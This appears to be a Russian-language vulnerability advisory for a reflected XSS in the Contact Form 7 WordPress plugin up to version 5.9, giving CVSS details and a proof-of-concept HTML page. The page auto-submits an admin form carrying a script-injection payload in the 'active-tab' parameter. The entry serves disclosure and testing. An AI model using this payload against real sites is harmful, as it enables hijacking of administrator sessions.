
Contact Form 7 <= 5.9 - Отражённый межсайтовый скриптинг
Contact Form 7 <= 5.9 - Отражённая межсайтовая скриптовая атака (XSS)
Плагин Contact Form 7 для WordPress уязвим к отражённой межсайтовой скриптовой атаке через параметр 'active-tab' во всех версиях до 5.9 включительно из-за недостаточной санитизации входных данных и экранирования вывода. Это позволяет неавторизованным злоумышленникам внедрять произвольные веб-скрипты на страницах, которые выполняются, если им удаётся обманом заставить пользователя выполнить действие, например, перейти по ссылке.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Вам нужно знать значение post id формы, иначе при клике администратора по ссылке она не сработает. В целом требуемые привилегии должны быть 'H', так как нужно, чтобы администратор перешёл по ссылке.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>